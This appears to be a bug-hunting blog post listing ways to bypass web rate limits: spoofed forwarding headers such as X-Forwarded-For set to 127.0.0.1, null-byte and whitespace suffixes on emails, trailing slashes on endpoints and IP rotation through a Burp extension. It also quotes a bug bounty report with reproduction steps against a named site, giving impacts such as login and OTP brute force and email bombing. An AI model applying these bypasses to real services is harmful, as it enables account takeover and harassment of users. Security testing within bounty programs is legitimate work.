Top Tricks for Rate Limit Bypass - Bug Hunting
We have some headers which can be used to Bypass Rate Limitation. All you have to do is to Use the Header just under the Host Header in the Request.
Use the following Header just Below the Host Header
X-Forwarded-For: IP
X-Forwarded-IP: IP
X-Client-IP: IP
X-Remote-IP: IP
X-Originating-IP: IP
X-Host: IP
X-Client: IP
#or use double X-Forwarded-For header
X-Forwarded-For:
X-Forwarded-For: IP
Example Use
X-Forwarded: 127.0.0.1
X-Forwarded-By: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Forwarded-For-Original: 127.0.0.1
X-Forwarder-For: 127.0.0.1
X-Forward-For: 127.0.0.1
Forwarded-For: 127.0.0.1
Forwarded-For-Ip: 127.0.0.1
X-Custom-IP-Authorization: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
Rate Limit Bypass using Special Characters
- Adding Null Byte ( %00 ) at the end of the Email can sometimes Bypass Rate Limit.
- Try adding a Space Character after a Email. ( Not Encoded )
- Some Common Characters that help bypassing Rate Limit : %0d , %2e , %09 , %20 , %0, %00, %0d%0a, %0a, %0C
- Adding a slash(/) at the end of api endpoint can also Bypass Rate Limit. domain.com/v1/login -> domain.com/v1/login/
Using IP Rotate Burp Extension
Try changing the user-agent, the cookies... anything that could be able to identify you
If they are limiting to 10 tries per IP, every 10 tries change the IP inside the header. Change other headers
Burp Suite's Extension IP Rotate works great in most of the cases. Make sure you have Python installed along.
Here You'll everything you need - https://github.com/PortSwigger/ip-rotate
Example Report Submitted by Bug Hunter for Rate Limit Bypass
https://hackerone.com/reports/1067533
I have found a technique that can easily bypass rate limit system of website and with this bug we attacker can easily attack into login panel, Sent unlimited number of huge notification to victim, bypass OTP codes and takeover accounts etc. Basically i have added a header X-Forwarded-For: 127.0.0.1 which will bypass the rate limit and reset request limits . Every time rate limit exceeded just change IP to another one and rate limit will itself reset.
Step to Reproduce:
Visit https://www.trycourier.app/
Goto email section
Enter victims email address
Fire-up burp-suite and intercept the request
Now Continue Sent request , If rate limit reached and blocked you then add X-Forwarded-For:127.0.0.1 header. This will easily reset rate limit. You can change IP address to 127.0.0.2 ,3,4,5,6 every time website blocked you.
( With this bypass you can easily send unlimited amount of huge email notification to victim and make victim annoying )
Impact
- Brute forcing login panel
- Trouble to the users on the website because huge email bombing can be done by the attackers within seconds.
- Brute force OTP codes etc.
0 comments:
Post a Comment